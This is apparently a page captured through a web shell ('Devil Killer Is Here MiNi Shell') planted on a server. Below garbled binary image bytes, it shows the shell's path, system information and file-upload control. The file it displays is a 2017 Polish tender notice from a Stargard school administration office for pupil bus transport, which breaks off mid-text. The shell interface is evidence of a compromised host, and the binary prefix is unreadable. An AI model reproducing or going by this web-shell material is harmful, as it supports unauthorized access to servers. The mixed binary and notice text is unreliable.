JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170803/562643-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 562643-N-2017 z dnia 2017-08-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Ośrodek Administracyjny Szkół Gminy Stargard Szczeciński</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przewóz uczniów z terenu gminy Stargard do Szkoły Podstawowej w Grzędzicach, Szkoły Podstawowej w Małkocinie, Szkoły Podstawowej w Pęzinie i Gimnazjum Gminy Stargard oraz przewozy dodatkowe wraz z zapewnieniem im opieki w okresie od 01.09.2017r. do 29.06.2018r.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Ośrodek Administracyjny Szkół Gminy Stargard Szczeciński</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">81081981300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Ceglana</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">11</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">73110 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stargard Szczeciński</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">915 783 884, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">oas@gmina.stargard.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.gmina.stargard.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.gmina.stargard.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.gmina.stargard.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">osobiście, pocztą</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Ceglana 11, 73-110 Stargard</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przewóz uczniów z terenu gminy Stargard do Szkoły Podstawowej w Grzędzicach, Szkoły Podstawowej w Małkocinie, Szkoły Podstawowej w Pęzinie i Gimnazjum Gminy Stargard oraz przewozy dodatkowe wraz z zapewnieniem im opieki w okresie od 01.09.2017r. do 29.06.2018r.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Wykonywanie przez Wykonawcę w okresie od 01.09.2017r. do 29.06.2018r. przewozu uczniów szkół podstawowych i Gimnazjum Gminy prowadzonych przez Gminę Stargard . Przewóz uczniów będzie odbywał się z miejsca ich zamieszkania do siedzib szkół i z siedzib szkół do miejsca ich zamieszkania zgodnie z planem przewozów opracowanym przez Zamawiającego dla części I, II, III, V zamówienia. Natomiast dla części IV zamówienia przewóz uczniów będzie odbywał się zgodnie z potrzebami szkół i po każdorazowym uzgodnieniu z Zamawiającym.2.	Liczba uczniów z poszczególnych miejscowości jest wielkością prognozowaną i może się zmienić w trakcie realizacji zamówienia ze względu na organizację i rotacje uczniów,3.	Przewóz odbywa się w dni nauki szkolnej dla części I, II, III, V zamówienia, natomiast dla części IV w dni nauki szkolnej i w dni wolne od nauki. W przypadku odpracowywania zajęć Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z obowiązującym planem przewozów.4.	Wykonawca zobowiązany jest zapewnić opiekuna w każdym środku transportu w trakcie przewozu uczniów. Opiekun winien czuwać nad bezpieczeństwem uczniów podczas wsiadania i wysiadania z pojazdu.5.	Wykonawca zobowiązany jest zapewnić miejsca siedzące wszystkim przewożonym uczniom,6.	Wykonawca jest zobowiązany przyjąć, zaakceptować i wypełnić następujące warunki wykonania zamówienia, dotyczące bezpieczeństwa transportu dzieci związane z przewozami szkolnymi:- przestrzeganie przepisów ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2013r, poz. 1414 ze zm.)- bezwzględne przestrzeganie przepisów ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz.U. z 2012 r. poz. 1137 ze zm.).7. Wykonawca jest zobowiązany ubezpieczyć autobusy będące jego własnością i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem.8. Środki transportu przeznaczone do przewozu muszą być sprawne technicznie i posiadać aktualne przeglądy techniczne, podczas realizacji zamówienia tak aby przewóz uczniów wyznaczoną w harmonogramie trasą był możliwy w każdych warunkach pogodowych i drogowych. Ponadto muszą być utrzymane w należytej czystości z zachowaniem estetyki wewnętrznej i zewnętrznej pojazdów. Powinny posiać sprawny system ogrzewania w okresie jesienno - zimowym oraz klimatyzację w okresie letnim, oznakowanie zgodne z obowiązującymi przepisami.9. Plan przewozów może podlegać modyfikacjom w trakcie realizacji zamówienia. Modyfikacje planu przewozów mogą dotyczyć godzin, ilości uczniów i krotności przywozów i odwozów. 10. Wymogiem jest by realizowane kursy dowozów i odwozów do szkół odbywały się autobusami dostosowanymi do przewozu odpowiedniej liczby dzieci wynikającej z aktualnego planu lekcji (dostępnego u dyrektorów szkół) dla poszczególnych części zamówienia.11. Wykonawca/y zobowiązany jest do ścisłej współpracy z Zamawiającym i dyrektorami szkół w zakresie ustalania dowozów i odwozów uczniów uwzględniając organizację roku szkolnego z każdym z dyrektorów w związku z rozporządzeniem o organizacji roku szkolnego dającym możliwość indywidualnego określenia terminów dni wolnych od zajęć dydaktyczno- wychowawczych (6 dni dla szkół podstawowych, 8 dni dla gimnazjów).12. Wykonawca w dniu podpisania umowy dostarczy Zamawiającemu wykaz kierowców i opiekunów zatrudnionych do realizacji usługi.13. Zgodnie z art. 29 ust. 3a ustawy z dnia 29 stycznia 2016r. Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 ze zm.), zwanej dalej Pzp, Zamawiający wymaga od Wykonawcy lub ewentualnego podwykonawcy zatrudnienia na podstawie umowy o pracę na okres realizacji zamówienia osób wykonujących czynności związane z dowozem i odwozem uczniów.14. Przedmiot zamówienia składa się z pięciu części:Część I. Przewóz uczniów do i ze Szkoły Podstawowej w Małkocinie.Przewóz obejmuje uczniów z miejscowości: Warchlino, Warchlinko (9 uczniów), Kiczarowo (12 uczniów),Grabowo (22 uczniów). Łącznie 43 uczniów.Planowany harmonogram przywozu i odwozów uczniów będzie się przedstawiał następująco:Przywóz od pon. do piątku- 22 km 7:20- Kol. Kiczarowo 7:30- Kiczarowo7:35- Kol. Grabowo Górna7:45- Grabowo 7:50- Kol. Grabowo Dolna8:00- SP Małkocin Odwóz I od pon. do piątku - 53 km13:15- SP Małkocin13:20- Siwkowo13:25- Warchlino13:30- Warchlinko13:40- SP Małkocin13:50 Kol. Grabowo Dolna13:55 Grabowo14:00-Kol. Grabowo Górna14:05-Kiczarowo14:10 - Kol. Kiczarowo14:20- SP MałkocinOdwóz II poniedziałek, wtorek, środa, czwartek, piątek - 22 km14:55- SP Małkocin15:10- Kol. Grabowo Dolna15:15- Grabowo15:20- Kol. Grabowo Górna15:30- Kiczarowo15:35-Kol. KiczarowoZamawiający przewiduje możliwość zmniejszenia liczby km o 20 km dziennie w przypadku przeprowadzenia przez Gminę Stargard remontu drogi na odcinku Grabowo - Małkocin, który jest preferowany przez Zamawiającego.Zamawiający przewiduje możliwość zwiększenia liczby km w przypadku zmiany planu lekcji do 20 km dziennie.Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach.Część II Przewóz uczniów do i z Gimnazjum Gminy Stargard.Zalecane przez Zamawiającego trasy:o	Miejscowości: Barzkowice (4 uczniów GG), Brudzewice ( 1 uczeń GG), Golina Golinko(2 uczniów GG), Pęzino ( 17 uczniów), Ulikowo (9 uczniów GG), Trzebiatów (9 uczniów GG), Krąpiel (6 uczniów GG). Łącznie 48 uczniów.Planowany harmonogram przywozu i odwozów uczniów przedstawia się następująco:Planowany harmonogram przywozu i odwozów uczniów przedstawia się następująco.Przywóz pn.-piąt.Barzkowice - 7:00 Golinka - 7:05 Golina - 7:10 Brudzewice Kol.- 7:15 Ulikowo - 7:25Pęzino Przystanek- 7:30 Trzebiatów - 7:35Krąpiel - 7:40Stargard Gimnazjum - 7:55Odwóz pon. - piątekStargard Gimnazjum- 14:30Krąpiel - 14:45Trzebiatów - 14:50Ulikowo - 15:00	Pęzino przystanek - 15:05SP Pęzino - 15:10 Brudzewice - 15:20Golina - 15:25Barzkowice - 15:30 Golinko - 15:35Średnia szacowana dzienna liczba km wg planowanego harmonogramu wynosi 89 km. Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach.	o	Miejscowości: Warchlino, Warchlinko i Siwkowo (4 uczniów Gimnazjum, 10 uczniów SP Małkocin), Kolonia Grabowo Górna, Grabowo (5 uczniów Gim.), Kiczarowo (4 uczniów Gim.). Łącznie 23 uczniów.Planowany harmonogram przywozu i odwozów uczniów będzie następujący:PrzywózWarchlino - 7:05Warchlinko - 7:10Siwkowo - 7:15SP Małkocin - 7:20Kol. Grabowo Górna - 7:30Grabowo - 7:35Kiczarowo - 7:40Stargard Gimnazjum - 7:55Odwóz wt. - piątek Stargard Gimnazjum - 14:30Kiczarowo - 14:45Kol. Grabowo Górna - 14:50Grabowo - 14:55SP Małkocin - 15:05 Siwkowo - 15:15( uczniowie Gimnazjum, uczniowie SP Małkocin)Warchlino - 15:20 ( uczniowie Gimnazjum, uczniowie SP Małkocin)Warchlinko - 15:25 ( uczniowie Gimnazjum, uczniowie SP Małkocin)	Szacowana dzienna liczba km wg planowanego harmonogramu 78 km.Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach.Zamawiający przewiduje możliwość zmniejszenia liczby km o 10 km w przypadku przeprowadzenia przez Gminę Stargard remontu drogi na odcinku Grabowo - Małkocin, który jest preferowany przez Zamawiającego .	Część III. Przewóz uczniów do i ze Szkoły Podstawowej w Grzędzicach.o	Przewóz uczniów obejmuje miejscowości: Koszewo (10 uczniów), Koszewko (2 uczniów), Wierzchląd (2 uczniów), Skalin (11 uczniów), Lipnik (14 uczniów). Łącznie 39 uczniów.Planowany harmonogram przywozu i odwozów uczniów przedstawia się następująco:Przywóz I Przywóz II Koszewo - 7:15 Koszewo - 8:50 Koszewko - 7:20 Koszewko - 8:55 Wierzchląd - 7:25 Wierzchląd - 9:00 Skalin - 7:30 Skalin - 9:05 Lipnik - 7:40 Lipnik - 9:15 SP Grzędzice - 7:45 SP Grzędzice - 9:20 Odwóz I Odwóz IISP Grzędzice - 13:30 SP Grzędzice - 15:00Lipnik - 13:35 Lipnik - 15:05Skalin - 13:45 Skalin - 15:15Wierzchląd - 13:50 Wierzchląd - 15:20Koszewko - 13:55 Koszewko - 15:25Koszewo - 14:00 Koszewo - 15:30Szacowana dzienna liczba km wg planowanego harmonogramu 99 km.Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach.o	Miejscowości: Żarowo (24 uczniów), Lubowo (13 uczniów), Grzędzice-Majątek (17 uczniów). Łącznie 54 uczniów.Planowany harmonogram przywozu i odwozów uczniów przedstawia się następująco.	Przywóz I Przywóz II Lubowo - 7:20 Lubowo - 8:55 Żarowo - 7:25 Żarowo -9:00 Grzędzice-Majątek - 7:40 Grzędzice Majątek - 9:15 SP Grzędzice - 7:45 SP Grzędzice - 9:20 Odwóz I Odwóz II	SP Grzędzice - 13:30 SP Grzędzice - 15:00 Grzędzice Majątek -13:40 Grzędzice Majątek - 15:10	Żarowo - 13:55 Żarowo - 15:25	Lubowo - 14:00 Lubowo - 15:30Szacowana dzienna liczba km wg planowanego harmonogramu 66 km.Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach.Część IV. Przewozy uczniów na zajęcia pozalekcyjne, konkursy, zawody międzyszkolne, rekolekcje, jasełka, przewozy uczniów w ramach działania 8.3 pn. ,,Wsparcie szkół i placówek prowadzących kształcenie ogólne oraz uczniów uczestniczących w kształceniu podstawowym, gimnazjalnym i ponadgimnazjalnym w ramach Strategii ZIT dla Szczecińskiego Obszaru Metropolitalnego" itp. według zapotrzebowania szkół prowadzonych przez Gminę Stargard na podstawie odrębnego rozliczenia faktycznie wykonanej usługi w oparciu o ustaloną stawkę za 1 km.Przewidywana ilość km - 7000 km w tym:- około 6000 km - na przewozy uczniów na zajęcia pozalekcyjne, konkursy, zawody międzyszkolne, rekolekcje, jasełka w całym roku szkolnym - około 1000 km - na przewozy uczniów 